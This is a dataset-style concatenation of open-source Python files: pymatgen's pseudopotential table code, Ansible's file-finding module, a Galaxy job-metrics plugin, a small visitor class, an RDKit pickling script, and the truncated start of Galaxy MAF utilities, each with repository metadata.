ax, fig, plt = get_ax_fig_plt(ax)
ax.grid(True)
ax.set_xlabel('r [Bohr]')
#ax.set_ylabel('density')
for i, den_name in enumerate(["ae_core_density", "pseudo_core_density"]):
rden = getattr(self, den_name)
label = "$n_c$" if i == 1 else r"$\tilde{n}_c$"
ax.plot(rden.mesh, rden.mesh * rden.values, label=label, lw=2)
ax.legend(loc="best")
return fig
@add_fig_kwargs
def plot_waves(self, ax=None, fontsize=12, **kwargs):
"""
Plot the AE and the pseudo partial waves.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
fontsize: fontsize for legends and titles
Returns: `matplotlib` figure
"""
ax, fig, plt = get_ax_fig_plt(ax)
ax.grid(True)
ax.set_xlabel("r [Bohr]")
ax.set_ylabel(r"$r\phi,\, r\tilde\phi\, [Bohr]^{-\frac{1}{2}}$")
#ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
#ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
for state, rfunc in self.pseudo_partial_waves.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, lw=2, label="PS-WAVE: " + state)
for state, rfunc in self.ae_partial_waves.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, lw=2, label="AE-WAVE: " + state)
ax.legend(loc="best", shadow=True, fontsize=fontsize)
return fig
@add_fig_kwargs
def plot_projectors(self, ax=None, fontsize=12, **kwargs):
"""
Plot the PAW projectors.
Args:
ax: matplotlib :class:`Axes` or None if a new figure should be created.
Returns: `matplotlib` figure
"""
ax, fig, plt = get_ax_fig_plt(ax)
title = kwargs.pop("title", "Projectors")
ax.grid(True)
ax.set_xlabel('r [Bohr]')
ax.set_ylabel(r"$r\tilde p\, [Bohr]^{-\frac{1}{2}}$")
#ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
#ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
for state, rfunc in self.projector_functions.items():
ax.plot(rfunc.mesh, rfunc.mesh * rfunc.values, label="TPROJ: " + state)
ax.legend(loc="best", shadow=True, fontsize=fontsize)
return fig
#@add_fig_kwargs
#def plot_potentials(self, **kwargs):
# """
# ================ ==============================================================
# kwargs Meaning
# ================ ==============================================================
# title Title of the plot (Default: None).
# show True to show the figure (Default).
# savefig 'abc.png' or 'abc.eps' to save the figure to a file.
# ================ ==============================================================
# Returns:
# `matplotlib` figure
# """
# title = kwargs.pop("title", "Potentials")
# show = kwargs.pop("show", True)
# savefig = kwargs.pop("savefig", None)
# import matplotlib.pyplot as plt
# fig = plt.figure()
# ax = fig.add_subplot(1,1,1)
# ax.grid(True)
# ax.set_xlabel('r [Bohr]')
# ax.set_ylabel('density')
# ax.axvline(x=self.paw_radius, linewidth=2, color='k', linestyle="--")
# ax.annotate("$r_c$", xy=(self.paw_radius + 0.1, 0.1))
# for state, rfunc in self.potentials.items():
# ax.plot(rfunc.mesh, rfunc.values, label="TPROJ: " + state)
# ax.legend(loc="best")
# if title is not None: fig.suptitle(title)
# if show: plt.show()
# if savefig: fig.savefig(savefig)
# return fig
class PseudoTable(collections.abc.Sequence, MSONable, metaclass=abc.ABCMeta):
"""
Define the pseudopotentials from the element table.
Individual elements are accessed by name, symbol or atomic number.
For example, the following all retrieve iron:
print elements[26]
Fe
print elements.Fe
Fe
print elements.symbol('Fe')
Fe
print elements.name('iron')
Fe
print elements.isotope('Fe')
Fe
"""
@classmethod
def as_table(cls, items):
"""
Return an instance of :class:`PseudoTable` from the iterable items.
"""
if isinstance(items, cls): return items
return cls(items)
@classmethod
def from_dir(cls, top, exts=None, exclude_dirs="_*"):
"""
Find all pseudos in the directory tree starting from top.
Args:
top: Top of the directory tree
exts: List of files extensions. if exts == "all_files"
we try to open all files in top
exclude_dirs: Wildcard used to exclude directories.
return: :class:`PseudoTable` sorted by atomic number Z.
"""
pseudos = []
if exts == "all_files":
for f in [os.path.join(top, fn) for fn in os.listdir(top)]:
if os.path.isfile(f):
try:
p = Pseudo.from_file(f)
if p:
pseudos.append(p)
else:
logger.info('Skipping file %s' % f)
except:
logger.info('Skipping file %s' % f)
if not pseudos:
logger.warning('No pseudopotentials parsed from folder %s' % top)
return None
logger.info('Creating PseudoTable with %i pseudopotentials' % len(pseudos))
else:
if exts is None: exts=("psp8",)
for p in find_exts(top, exts, exclude_dirs=exclude_dirs):
try:
pseudos.append(Pseudo.from_file(p))
except Exception as exc:
logger.critical("Error in %s:\n%s" % (p, exc))
return cls(pseudos).sort_by_z()
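# Usage sketch (the directory path is hypothetical): build a table from a folder of psp8
# files and pick a pseudo by chemical symbol, roughly:
#
#   table = PseudoTable.from_dir("./pseudos", exts=("psp8",))
#   si = table.pseudo_with_symbol("Si")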
def __init__(self, pseudos):
"""
Args:
pseudos: List of pseudopotentials or filepaths
"""
# Store pseudos in a default dictionary with z as key.
# Note that we can have more than one pseudo for given z.
# hence the values are lists of pseudos.
if not isinstance(pseudos, collections.abc.Iterable):
pseudos = [pseudos]
if len(pseudos) and is_string(pseudos[0]):
pseudos = list_strings(pseudos)
self._pseudos_with_z = defaultdict(list)
for pseudo in pseudos:
if not isinstance(pseudo, Pseudo):
pseudo = Pseudo.from_file(pseudo)
if pseudo is not None:
self._pseudos_with_z[pseudo.Z].append(pseudo)
for z in self.zlist:
pseudo_list = self._pseudos_with_z[z]
symbols = [p.symbol for p in pseudo_list]
symbol = symbols[0]
if any(symb != symbol for symb in symbols):
raise ValueError("All symbols must be equal while they are: %s" % str(symbols))
setattr(self, symbol, pseudo_list)
def __getitem__(self, Z):
"""
Retrieve pseudos for the atomic number z. Accepts both int and slice objects.
"""
if isinstance(Z, slice):
assert Z.stop is not None
pseudos = []
for znum in iterator_from_slice(Z):
pseudos.extend(self._pseudos_with_z[znum])
return self.__class__(pseudos)
else:
return self.__class__(self._pseudos_with_z[Z])
def __len__(self):
return len(list(self.__iter__()))
def __iter__(self):
"""Process the elements in Z order."""
for z in self.zlist:
for pseudo in self._pseudos_with_z[z]:
yield pseudo
def __repr__(self):
return "<%s at %s>" % (self.__class__.__name__, id(self))
def __str__(self):
return self.to_table()
@property
def allnc(self):
"""True if all pseudos are norm-conserving."""
return all(p.isnc for p in self)
@property
def allpaw(self):
"""True if all pseudos are PAW."""
return all(p.ispaw for p in self)
@property
def zlist(self):
"""Ordered list with the atomic numbers available in the table."""
return sorted(list(self._pseudos_with_z.keys()))
#def max_ecut_pawecutdg(self, accuracy):
#"""Return the maximum value of ecut and pawecutdg based on the hints available in the pseudos."""
# ecut = max(p.hint_for_accuracy(accuracy=accuracy).ecut for p in self)
# pawecutdg = max(p.hint_for_accuracy(accuracy=accuracy).pawecutdg for p in self)
# return ecut, pawecutdg
def as_dict(self, **kwargs):
d = {}
for p in self:
k, count = p.element.name, 1
# k, count = p.element, 1
# Handle multiple-pseudos with the same name!
while k in d:
                k = k.split("#")[0] + "#" + str(count)
count += 1
d.update({k: p.as_dict()})
d['@module'] = self.__class__.__module__
d['@class'] = self.__class__.__name__
return d
@classmethod
def from_dict(cls, d):
pseudos = []
dec = MontyDecoder()
for k, v in d.items():
if not k.startswith('@'):
pseudos.append(dec.process_decoded(v))
return cls(pseudos)
def is_complete(self, zmax=118):
"""
        True if table is complete i.e. all elements with Z < zmax have at least one pseudopotential
"""
for z in range(1, zmax):
if not self[z]: return False
return True
def all_combinations_for_elements(self, element_symbols):
"""
        Return a list with all the possible combinations of pseudos
for the given list of element_symbols.
Each item is a list of pseudopotential objects.
Example::
table.all_combinations_for_elements(["Li", "F"])
"""
d = OrderedDict()
for symbol in element_symbols:
d[symbol] = self.select_symbols(symbol, ret_list=True)
from itertools import product
return list(product(*d.values()))
def pseudo_with_symbol(self, symbol, allow_multi=False):
"""
Return the pseudo with the given chemical symbol.
Args:
            symbol: String with the chemical symbol of the element
allow_multi: By default, the method raises ValueError
if multiple occurrences are found. Use allow_multi to prevent this.
Raises:
            ValueError if symbol is not found or multiple occurrences are present and not allow_multi
"""
pseudos = self.select_symbols(symbol, ret_list=True)
if not pseudos or (len(pseudos) > 1 and not allow_multi):
raise ValueError("Found %d occurrences of symbol %s" % (len(pseudos), symbol))
if not allow_multi:
return pseudos[0]
else:
return pseudos
def pseudos_with_symbols(self, symbols):
"""
Return the pseudos with the given chemical symbols.
Raises:
            ValueError if one of the symbols is not found or multiple occurrences are present.
"""
pseudos = self.select_symbols(symbols, ret_list=True)
found_symbols = [p.symbol for p in pseudos]
duplicated_elements = [s for s, o in collections.Counter(found_symbols).items() if o > 1]
if duplicated_elements:
raise ValueError("Found multiple occurrences of symbol(s) %s" % ', '.join(duplicated_elements))
missing_symbols = [s for s in symbols if s not in found_symbols]
if missing_symbols:
raise ValueError("Missing data for symbol(s) %s" % ', '.join(missing_symbols))
return pseudos
def select_symbols(self, symbols, ret_list=False):
"""
Return a :class:`PseudoTable` with the pseudopotentials with the given list of chemical symbols.
Args:
symbols: str or list of symbols
Prepend the symbol string with "-", to exclude pseudos.
ret_list: if True a list of pseudos is returned instead of a :class:`PseudoTable`
"""
symbols = list_strings(symbols)
exclude = symbols[0].startswith("-")
if exclude:
if not all(s.startswith("-") for s in symbols):
raise ValueError("When excluding symbols, all strings must start with `-`")
symbols = [s[1:] for s in symbols]
symbols = set(symbols)
pseudos = []
for p in self:
if exclude:
if p.symbol in symbols: continue
else:
if p.symbol not in symbols: continue
pseudos.append(p)
if ret_list:
return pseudos
else:
return self.__class__(pseudos)
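    # e.g. (hypothetical): table.select_symbols(["-Si", "-O"]) returns a new
    # PseudoTable with all Si and O pseudos excluded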
def get_pseudos_for_structure(self, structure):
"""
Return the list of :class:`Pseudo` objects to be used for this :class:`Structure`.
Args:
structure: pymatgen :class:`Structure`.
Raises:
`ValueError` if one of the chemical symbols is not found or
            multiple occurrences are present in the table.
"""
return self.pseudos_with_symbols(structure.symbol_set)
def print_table(self, stream=sys.stdout, filter_function=None):
"""
A pretty ASCII printer for the periodic table, based on some filter_function.
Args:
stream: file-like object
filter_function:
A filtering function that take a Pseudo as input and returns a boolean.
For example, setting filter_function = lambda p: p.Z_val > 2 will print
a periodic table containing only pseudos with Z_val > 2.
"""
print(self.to_table(filter_function=filter_function), file=stream)
def to_table(self, filter_function=None):
"""Return string with data in tabular form."""
table = []
for p in self:
            if filter_function is not None and not filter_function(p): continue
            table.append([p.basename, p.symbol, p.Z_val, p.l_max, p.l_local, p.xc, p.type])
        return tabulate(table, headers=["basename", "symbol", "Z_val", "l_max", "l_local", "XC", "type"],
                        tablefmt="grid")
def sorted(self, attrname, reverse=False):
"""
Sort the table according to the value of attribute attrname.
Return:
New class:`PseudoTable` object
"""
attrs = []
        for i, pseudo in enumerate(self):
try:
a = getattr(pseudo, attrname)
except AttributeError:
a = np.inf
attrs.append((i, a))
# Sort attrs, and build new table with sorted pseudos.
return self.__class__([self[a[0]] for a in sorted(attrs, key=lambda t: t[1], reverse=reverse)])
def sort_by_z(self):
"""Return a new :class:`PseudoTable` with pseudos sorted by Z"""
return self.__class__(sorted(self, key=lambda p: p.Z))
def select(self, condition):
"""
Select only those pseudopotentials for which condition is True.
Return new class:`PseudoTable` object.
Args:
condition:
Function that accepts a :class:`Pseudo` object and returns True or False.
"""
return self.__class__([p for p in self if condition(p)])
def with_dojo_report(self):
"""Select pseudos containing the DOJO_REPORT section. Return new class:`PseudoTable` object."""
return self.select(condition=lambda p: p.has_dojo_report)
def select_rows(self, rows):
"""
Return new class:`PseudoTable` object with pseudos in the given rows of the periodic table.
        rows can be either an int or a list of integers.
"""
if not isinstance(rows, (list, tuple)): rows = [rows]
return self.__class__([p for p in self if p.element.row in rows])
def select_family(self, family):
# e.g element.is_alkaline
return self.__class__([p for p in self if getattr(p.element, "is_" + family)])
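# A minimal usage sketch (hypothetical paths; assumes a directory of .psp8 files):
#
#   table = PseudoTable.from_dir("/path/to/pseudos", exts=("psp8",))
#   si = table.pseudo_with_symbol("Si")
#   licl_combos = table.all_combinations_for_elements(["Li", "Cl"])
#   nc_only = table.select(condition=lambda p: p.isnc)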
|
montoyjh/pymatgen
|
pymatgen/io/abinit/pseudos.py
|
Python
|
mit
| 63,324
|
[
"ABINIT",
"pymatgen"
] |
f44d7eac1a680462eac59039b1cc22f51ad78c8f365fad0f04a2212b6420fe80
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2014, Ruggero Marchei <ruggero.marchei@daemonzone.net>
# Copyright: (c) 2015, Brian Coca <bcoca@ansible.com>
# Copyright: (c) 2016-2017, Konstantin Shalygin <k0ste@k0ste.ru>
# Copyright: (c) 2017, Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'core'}
DOCUMENTATION = r'''
---
module: find
author: Brian Coca (based on Ruggero Marchei's Tidy)
version_added: "2.0"
short_description: Return a list of files based on specific criteria
description:
- Return a list of files based on specific criteria. Multiple criteria are AND'd together.
- For Windows targets, use the M(win_find) module instead.
options:
age:
description:
- Select files whose age is equal to or greater than the specified time.
Use a negative age to find files equal to or less than the specified time.
You can choose seconds, minutes, hours, days, or weeks by specifying the
first letter of any of those words (e.g., "1w").
patterns:
default: '*'
description:
            - One or more (shell or regex) patterns, whose type is controlled by the C(use_regex) option.
- The patterns restrict the list of files to be returned to those whose basenames match at
least one of the patterns specified. Multiple patterns can be specified using a list.
aliases: ['pattern']
excludes:
default: null
description:
            - One or more (shell or regex) patterns, whose type is controlled by the C(use_regex) option.
            - Items matching any of these patterns are excluded from the result list. Multiple patterns
              can be specified using a list.
aliases: ['exclude']
version_added: "2.5"
contains:
description:
- One or more regex patterns which should be matched against the file content.
paths:
required: true
aliases: [ name, path ]
description:
- List of paths of directories to search. All paths must be fully qualified.
file_type:
description:
- Type of file to select.
- The 'link' and 'any' choices were added in version 2.3.
choices: [ any, directory, file, link ]
default: file
recurse:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- If target is a directory, recursively descend into the directory looking for files.
size:
description:
- Select files whose size is equal to or greater than the specified size.
Use a negative size to find files equal to or less than the specified size.
Unqualified values are in bytes, but b, k, m, g, and t can be appended to specify
bytes, kilobytes, megabytes, gigabytes, and terabytes, respectively.
Size is not evaluated for directories.
age_stamp:
default: mtime
choices: [ atime, ctime, mtime ]
description:
- Choose the file property against which we compare age.
hidden:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to include hidden files, otherwise they'll be ignored.
follow:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to follow symlinks in path for systems with python 2.6+.
get_checksum:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- Set this to true to retrieve a file's sha1 checksum.
use_regex:
default: 'no'
choices: [ 'no', 'yes' ]
description:
- If false the patterns are file globs (shell) if true they are python regexes.
depth:
required: false
default: null
description:
            - Set the maximum number of levels to descend into. Setting recurse
              to false will override this value, which is effectively depth 1.
              Default is unlimited depth.
version_added: "2.6"
notes:
- For Windows targets, use the M(win_find) module instead.
'''
EXAMPLES = r'''
- name: Recursively find /tmp files older than 2 days
find:
paths: /tmp
age: 2d
recurse: yes
- name: Recursively find /tmp files older than 4 weeks and equal or greater than 1 megabyte
find:
paths: /tmp
age: 4w
size: 1m
recurse: yes
- name: Recursively find /var/tmp files with last access time greater than 3600 seconds
find:
paths: /var/tmp
age: 3600
age_stamp: atime
recurse: yes
- name: Find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz
find:
paths: /var/log
patterns: '*.old,*.log.gz'
size: 10m
# Note that YAML double quotes require escaping backslashes but yaml single quotes do not.
- name: Find /var/log files equal or greater than 10 megabytes ending with .old or .log.gz via regex
find:
paths: /var/log
patterns: "^.*?\\.(?:old|log\\.gz)$"
size: 10m
use_regex: yes
- name: Find /var/log all directories, exclude nginx and mysql
find:
paths: /var/log
recurse: no
file_type: directory
excludes: 'nginx,mysql'
'''
RETURN = r'''
files:
description: all matches found with the specified criteria (see stat module for full output of each dictionary)
returned: success
type: list
sample: [
{ path: "/var/tmp/test1",
mode: "0644",
"...": "...",
checksum: 16fac7be61a6e4591a33ef4b729c5c3302307523
},
{ path: "/var/tmp/test2",
"...": "..."
},
]
matched:
description: number of matches
returned: success
    type: int
sample: 14
examined:
description: number of filesystem objects looked at
returned: success
    type: int
sample: 34
'''
import fnmatch
import grp
import os
import pwd
import re
import stat
import sys
import time
from ansible.module_utils.basic import AnsibleModule
def pfilter(f, patterns=None, excludes=None, use_regex=False):
'''filter using glob patterns'''
if patterns is None and excludes is None:
return True
if use_regex:
if patterns and excludes is None:
for p in patterns:
r = re.compile(p)
if r.match(f):
return True
elif patterns and excludes:
for p in patterns:
r = re.compile(p)
if r.match(f):
for e in excludes:
r = re.compile(e)
if r.match(f):
return False
return True
else:
if patterns and excludes is None:
for p in patterns:
if fnmatch.fnmatch(f, p):
return True
elif patterns and excludes:
for p in patterns:
if fnmatch.fnmatch(f, p):
for e in excludes:
if fnmatch.fnmatch(f, e):
return False
return True
return False
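# Examples of pfilter behaviour in glob mode (hypothetical filenames):
#   pfilter('error.log', patterns=['*.log'])              -> True
#   pfilter('nginx', patterns=['*'], excludes=['nginx'])  -> False
#   pfilter('mysql', patterns=['*'], excludes=['nginx'])  -> True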
def agefilter(st, now, age, timestamp):
'''filter files older than age'''
if age is None:
return True
    elif age >= 0 and now - getattr(st, "st_%s" % timestamp) >= abs(age):
        return True
    elif age < 0 and now - getattr(st, "st_%s" % timestamp) <= abs(age):
return True
return False
def sizefilter(st, size):
'''filter files greater than size'''
if size is None:
return True
elif size >= 0 and st.st_size >= abs(size):
return True
elif size < 0 and st.st_size <= abs(size):
return True
return False
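# e.g. sizefilter(st, 1024) keeps files of at least 1 KiB, while
# sizefilter(st, -1024) keeps files of at most 1 KiB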
def contentfilter(fsname, pattern):
'''filter files which contain the given expression'''
if pattern is None:
return True
try:
f = open(fsname)
prog = re.compile(pattern)
for line in f:
if prog.match(line):
f.close()
return True
f.close()
except:
pass
return False
def statinfo(st):
pw_name = ""
gr_name = ""
try: # user data
pw_name = pwd.getpwuid(st.st_uid).pw_name
except:
pass
try: # group data
gr_name = grp.getgrgid(st.st_gid).gr_name
except:
pass
return {
'mode': "%04o" % stat.S_IMODE(st.st_mode),
'isdir': stat.S_ISDIR(st.st_mode),
'ischr': stat.S_ISCHR(st.st_mode),
'isblk': stat.S_ISBLK(st.st_mode),
'isreg': stat.S_ISREG(st.st_mode),
'isfifo': stat.S_ISFIFO(st.st_mode),
'islnk': stat.S_ISLNK(st.st_mode),
'issock': stat.S_ISSOCK(st.st_mode),
'uid': st.st_uid,
'gid': st.st_gid,
'size': st.st_size,
'inode': st.st_ino,
'dev': st.st_dev,
'nlink': st.st_nlink,
'atime': st.st_atime,
'mtime': st.st_mtime,
'ctime': st.st_ctime,
'gr_name': gr_name,
'pw_name': pw_name,
'wusr': bool(st.st_mode & stat.S_IWUSR),
'rusr': bool(st.st_mode & stat.S_IRUSR),
'xusr': bool(st.st_mode & stat.S_IXUSR),
'wgrp': bool(st.st_mode & stat.S_IWGRP),
'rgrp': bool(st.st_mode & stat.S_IRGRP),
'xgrp': bool(st.st_mode & stat.S_IXGRP),
'woth': bool(st.st_mode & stat.S_IWOTH),
'roth': bool(st.st_mode & stat.S_IROTH),
'xoth': bool(st.st_mode & stat.S_IXOTH),
'isuid': bool(st.st_mode & stat.S_ISUID),
'isgid': bool(st.st_mode & stat.S_ISGID),
}
def main():
module = AnsibleModule(
argument_spec=dict(
paths=dict(type='list', required=True, aliases=['name', 'path']),
patterns=dict(type='list', default=['*'], aliases=['pattern']),
excludes=dict(type='list', aliases=['exclude']),
contains=dict(type='str'),
file_type=dict(type='str', default="file", choices=['any', 'directory', 'file', 'link']),
age=dict(type='str'),
age_stamp=dict(type='str', default="mtime", choices=['atime', 'mtime', 'ctime']),
size=dict(type='str'),
recurse=dict(type='bool', default='no'),
hidden=dict(type='bool', default='no'),
follow=dict(type='bool', default='no'),
get_checksum=dict(type='bool', default='no'),
use_regex=dict(type='bool', default='no'),
depth=dict(type='int', default=None),
),
supports_check_mode=True,
)
params = module.params
filelist = []
if params['age'] is None:
age = None
else:
# convert age to seconds:
m = re.match(r"^(-?\d+)(s|m|h|d|w)?$", params['age'].lower())
seconds_per_unit = {"s": 1, "m": 60, "h": 3600, "d": 86400, "w": 604800}
if m:
age = int(m.group(1)) * seconds_per_unit.get(m.group(2), 1)
else:
module.fail_json(age=params['age'], msg="failed to process age")
if params['size'] is None:
size = None
else:
# convert size to bytes:
m = re.match(r"^(-?\d+)(b|k|m|g|t)?$", params['size'].lower())
bytes_per_unit = {"b": 1, "k": 1024, "m": 1024**2, "g": 1024**3, "t": 1024**4}
if m:
size = int(m.group(1)) * bytes_per_unit.get(m.group(2), 1)
else:
module.fail_json(size=params['size'], msg="failed to process size")
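    # e.g. age '2d' -> 172800 seconds; size '10m' -> 10485760 bytes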
now = time.time()
msg = ''
looked = 0
for npath in params['paths']:
npath = os.path.expanduser(os.path.expandvars(npath))
if os.path.isdir(npath):
            # ignore followlinks for python version < 2.6
for root, dirs, files in (sys.version_info < (2, 6, 0) and os.walk(npath)) or os.walk(npath, followlinks=params['follow']):
if params['depth']:
depth = root.replace(npath.rstrip(os.path.sep), '').count(os.path.sep)
if files or dirs:
depth += 1
if depth > params['depth']:
del(dirs[:])
continue
looked = looked + len(files) + len(dirs)
for fsobj in (files + dirs):
fsname = os.path.normpath(os.path.join(root, fsobj))
if os.path.basename(fsname).startswith('.') and not params['hidden']:
continue
try:
st = os.lstat(fsname)
except:
msg += "%s was skipped as it does not seem to be a valid file or it cannot be accessed\n" % fsname
continue
r = {'path': fsname}
if params['file_type'] == 'any':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISDIR(st.st_mode) and params['file_type'] == 'directory':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
elif stat.S_ISREG(st.st_mode) and params['file_type'] == 'file':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and \
agefilter(st, now, age, params['age_stamp']) and \
sizefilter(st, size) and contentfilter(fsname, params['contains']):
r.update(statinfo(st))
if params['get_checksum']:
r['checksum'] = module.sha1(fsname)
filelist.append(r)
elif stat.S_ISLNK(st.st_mode) and params['file_type'] == 'link':
if pfilter(fsobj, params['patterns'], params['excludes'], params['use_regex']) and agefilter(st, now, age, params['age_stamp']):
r.update(statinfo(st))
filelist.append(r)
if not params['recurse']:
break
else:
msg += "%s was skipped as it does not seem to be a valid directory or it cannot be accessed\n" % npath
matched = len(filelist)
module.exit_json(files=filelist, changed=False, msg=msg, matched=matched, examined=looked)
if __name__ == '__main__':
main()
|
rahushen/ansible
|
lib/ansible/modules/files/find.py
|
Python
|
gpl-3.0
| 14,992
|
[
"Brian"
] |
a000232998a2cbab5ae2ece55c4d7b0a541be10d0621047ab85f56efe3dd46db
|
from ..instrumenters import InstrumentPlugin
from ...metrics import formatting
import time
import logging
log = logging.getLogger( __name__ )
GALAXY_SLOTS_KEY = "galaxy_slots"
START_EPOCH_KEY = "start_epoch"
END_EPOCH_KEY = "end_epoch"
RUNTIME_SECONDS_KEY = "runtime_seconds"
class CorePluginFormatter( formatting.JobMetricFormatter ):
def format( self, key, value ):
value = int( value )
if key == GALAXY_SLOTS_KEY:
return ( "Cores Allocated", "%d" % value )
elif key == RUNTIME_SECONDS_KEY:
return ( "Job Runtime (Wall Clock)", formatting.seconds_to_str( value ) )
else:
# TODO: Use localized version of this from universe_wsgi.ini
title = "Job Start Time" if key == START_EPOCH_KEY else "Job End Time"
return (title, time.strftime( '%Y-%m-%d %H:%M:%S', time.localtime( value ) ) )
class CorePlugin( InstrumentPlugin ):
""" Simple plugin that collects data without external dependencies. In
particular it currently collects value set for Galaxy slots.
"""
plugin_type = "core"
formatter = CorePluginFormatter()
def __init__( self, **kwargs ):
pass
def pre_execute_instrument( self, job_directory ):
commands = []
commands.append( self.__record_galaxy_slots_command( job_directory ) )
commands.append( self.__record_seconds_since_epoch_to_file( job_directory, "start" ) )
return commands
def post_execute_instrument( self, job_directory ):
commands = []
commands.append( self.__record_seconds_since_epoch_to_file( job_directory, "end" ) )
return commands
def job_properties( self, job_id, job_directory ):
galaxy_slots_file = self.__galaxy_slots_file( job_directory )
properties = {}
properties[ GALAXY_SLOTS_KEY ] = self.__read_integer( galaxy_slots_file )
start = self.__read_seconds_since_epoch( job_directory, "start" )
end = self.__read_seconds_since_epoch( job_directory, "end" )
if start is not None and end is not None:
properties[ START_EPOCH_KEY ] = start
properties[ END_EPOCH_KEY ] = end
properties[ RUNTIME_SECONDS_KEY ] = end - start
return properties
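    # a job_properties() result might look like (hypothetical values):
    # { 'galaxy_slots': 4, 'start_epoch': 1400000000, 'end_epoch': 1400000100, 'runtime_seconds': 100 }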
def __record_galaxy_slots_command( self, job_directory ):
galaxy_slots_file = self.__galaxy_slots_file( job_directory )
return '''echo "$GALAXY_SLOTS" > '%s' ''' % galaxy_slots_file
def __record_seconds_since_epoch_to_file( self, job_directory, name ):
path = self._instrument_file_path( job_directory, "epoch_%s" % name )
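        # string concatenation (not %-interpolation) is deliberate here:
        # "%s" is the date(1) format specifier for seconds since the epoch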
return 'date +"%s" > ' + path
def __read_seconds_since_epoch( self, job_directory, name ):
path = self._instrument_file_path( job_directory, "epoch_%s" % name )
return self.__read_integer( path )
def __galaxy_slots_file( self, job_directory ):
return self._instrument_file_path( job_directory, "galaxy_slots" )
def __read_integer( self, path ):
value = None
try:
value = int( open( path, "r" ).read() )
except Exception:
pass
return value
__all__ = [ 'CorePlugin' ]
|
jmchilton/lwr
|
galaxy/jobs/metrics/instrumenters/core.py
|
Python
|
apache-2.0
| 3,192
|
[
"Galaxy"
] |
1ceb63fe46c7c63902396fd548310d38b5fad8c3150938ad188379465c516286
|
class ObjectVisitor(object):
def visit_objects(self, objects):
for tag, obj in objects.iteritems():
self.visit(obj)
def generic_visit(self, obj):
pass
def visit(self, obj):
visitor_name = 'visit_%s' % obj['class']
return getattr(self, visitor_name, self.generic_visit)(obj)
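# A minimal usage sketch (hypothetical 'Struct' tag objects, assuming each
# object dict carries a 'class' key):
#
#   class Printer(ObjectVisitor):
#       def visit_Struct(self, obj):
#           print obj['class']
#
#   Printer().visit_objects({'mytag': {'class': 'Struct'}})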
|
fredreichbier/babbisch
|
babbisch/client.py
|
Python
|
mit
| 332
|
[
"VisIt"
] |
b6d52e013130c62caca1e686883de75f53380c0ff545cab0c370f6f90be17f1d
|
import pickle
import os.path as osp
import numpy as np
from rdkit import Chem
inputs_path = osp.realpath("../../examples/sEH-TPPU")
TPPU_MOL_path = osp.join(inputs_path, "TPPU.mol")
TPPU_MOL_rdkit = Chem.MolFromMolFile(TPPU_MOL_path, sanitize=True)
TPPU_PDB_path = osp.join(inputs_path, "TPPU.pdb")
TPPU_PDB_rdkit = Chem.MolFromPDBFile(TPPU_PDB_path, removeHs=False, sanitize=False)
seh_PDB_path = osp.join(inputs_path, "sEH.pdb")
seh_rdkit = Chem.MolFromPDBFile(seh_PDB_path, removeHs=False, sanitize=False)
from mastic.interfaces.rdkit import AssignBondOrdersFromTemplate
TPPU_rdkit = AssignBondOrdersFromTemplate(TPPU_MOL_rdkit, TPPU_PDB_rdkit)
from mastic.interfaces.rdkit import RDKitMoleculeWrapper
TPPU_rdkit_wrapper = RDKitMoleculeWrapper(TPPU_rdkit, mol_name="TPPU")
seh_rdkit_wrapper = RDKitMoleculeWrapper(seh_rdkit, mol_name="sEH")
TPPU_coords = TPPU_rdkit_wrapper.get_conformer_coords(0)
seh_coords = seh_rdkit_wrapper.get_conformer_coords(0)
member_coords = [TPPU_coords, seh_coords]
# pickle everything
TPPU_rdkit_pkl_path = osp.join(".", "TPPU_rdkit.pkl")
seh_rdkit_pkl_path = osp.join(".", "sEH_rdkit.pkl")
TPPU_coords_path = osp.join(".", "TPPU.npy")
seh_coords_path = osp.join(".", "sEH.npy")
with open(TPPU_rdkit_pkl_path, 'wb') as wf:
pickle.dump(TPPU_rdkit_wrapper, wf)
with open(seh_rdkit_pkl_path, 'wb') as wf:
pickle.dump(seh_rdkit_wrapper, wf)
np.save(TPPU_coords_path, TPPU_coords)
np.save(seh_coords_path, seh_coords)
|
salotz/mast
|
prototypes/profile_system/make_pkls.py
|
Python
|
mit
| 1,463
|
[
"RDKit"
] |
beb1af1da0eec98c2c41afcf55ca24435cf1bd584d415ca19de85bcee802af0d
|
#!/usr/bin/env python
"""
Provides wrappers and utilities for working with MAF files and alignments.
"""
#Dan Blankenberg
import pkg_resources; pkg_resources.require( "bx-python" )
import bx.align.maf
import bx.intervals
import bx.interval_index_file
import sys, os, string, tempfile
import logging
from copy import deepcopy
assert sys.version_info[:2] >= ( 2, 4 )
log = logging.getLogger(__name__)
GAP_CHARS = [ '-' ]
SRC_SPLIT_CHAR = '.'
def src_split( src ):
fields = src.split( SRC_SPLIT_CHAR, 1 )
spec = fields.pop( 0 )
if fields:
chrom = fields.pop( 0 )
else:
chrom = spec
return spec, chrom
def src_merge( spec, chrom, contig = None ):
if None in [ spec, chrom ]:
spec = chrom = spec or chrom
return bx.align.maf.src_merge( spec, chrom, contig )
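#e.g. src_split( 'hg18.chr1' ) -> ( 'hg18', 'chr1' ); src_split( 'hg18' ) -> ( 'hg18', 'hg18' )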
def get_species_in_block( block ):
species = []
for c in block.components:
spec, chrom = src_split( c.src )
if spec not in species:
species.append( spec )
return species
def tool_fail( msg = "Unknown Error" ):
